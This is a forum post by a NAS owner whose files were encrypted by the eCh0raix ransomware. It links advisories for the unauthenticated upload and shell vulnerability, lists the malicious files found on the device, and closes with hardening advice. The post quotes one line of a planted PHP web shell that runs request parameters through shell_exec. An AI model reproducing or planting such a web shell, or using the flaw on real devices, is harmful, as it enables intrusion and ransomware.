Hi guys,
First of all, sorry for my english.
After this, same here.
24 december i've been infected by this ransomware (eCh0raix).
All my docs files and images (not video) results in *.encrypt format.
1TB of data.
After some research i've found that's this is the vulnberability involved:
https://www.exploit-db.com/exploits/49330
http://www.pentest.com.tr/exploits/Terr ... ution.html
https://www.ihteam.net/advisory/terrama ... abilities/
I've tested this with metasploit and some scripts.
It's easy to access to Nas with a simple script using 8181 port.
Seems more difficult using SSL port 5443.
With this, without any username and password, you can upload file, obtain shell on /usr/www/ and launch "your" binary from there.Scary.
On that folder 'i've found some php file and other stuff:
-crp_linux_arm
-sd_arm
-debug34345.php
-ssl3.php
-ssl.php
and some other php files with inside shit like:
if(md5($_REQUEST['p'])=='9d761a9690662f2432d1fbbe7197d448'){echo shell_exec($_REQUEST['c'])
etc etc
crp_linux_arm , in my esperience, was the scarier binary.
I've tested it on a virtual machine and if you launch it, all filesystem has been scanned and encrypted.
I am writing these things so this doesn't happen to others.
You are advised to never publish port 8181.
If you really need to publish, do it with SSL (but don't use 5443 by default).
If you publish 8181/http on the internet, there are no antivirus or firewall that can prevent you from being attacked imho.
Anyway, from what I have read this variant cannot be solved with the decryption tool.
I've tried wthout success.
The only way is to back up the encrypted files and wait for new software to be developed.
I had the latest version of the stable firmware but I'm noting that there are beta versions (4.2.07 the more recent one) here.
Do you know if these are still affected by that vulnerability?
PS: the thing that pisses me off is that this vulnerability has been known for months, but there are no stable updates that fix it.